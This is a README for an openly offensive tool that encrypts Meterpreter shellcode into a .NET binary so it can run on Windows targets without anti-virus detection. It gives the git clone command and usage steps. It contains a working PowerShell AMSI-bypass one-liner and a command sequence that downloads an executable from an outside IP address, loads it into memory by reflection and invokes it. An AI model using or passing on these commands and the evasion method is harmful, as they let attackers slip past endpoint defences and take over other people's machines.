Shellcode Encryptor
A simple shellcode encryptor/decryptor/executor to bypass anti-virus.
Purpose
To generate a .Net binary containing base64 encoded, AES encrypted shellcode that will execute on a Windows target, bypassing anti-virus.
Download
git clone https://github.com/plackyhacker/Shellcode-Encryptor.git
Use
Use the meterpreter_encryptor.py to create the encrypted base64 shellcode:
Take the key and shellcode and insert them into ProcessInjector.cs
// decrypt the base64 payload
string payload = "sZkMii [etc...]";
string key = "fjlmjiEgnQ4K6CjNCrPlqug1HW4icMec";
Compile the C# code into an executable (e.g., metInject.exe) and serve it via a web server.
Inject the executable into a remote PowerShell process:
# AMSI bypass
$a = [Ref].Assembly.GetTypes();ForEach($b in $a) {if ($b.Name -like "*iutils") {$c = $b}};$d = $c.GetFields('NonPublic,Static');ForEach($e in $d) {if ($e.Name -like "*itFailed") {$f = $e}};$f.SetValue($null,$true)
$bytes = (Invoke-WebRequest "http://192.168.1.228/metInject.exe").Content;
$assembly = [System.Reflection.Assembly]::Load($bytes);
$entryPointMethod = $assembly.GetType('ProcessInjection.Program', [Reflection.BindingFlags] 'Public, NonPublic').GetMethod('Main', [Reflection.BindingFlags] 'Static, Public, NonPublic');
$entryPointMethod.Invoke($null, (, [string[]] ('', '')));
The binary was scanned using antiscan.me on 03/10/2021.
Source: https://github.com/plackyhacker/
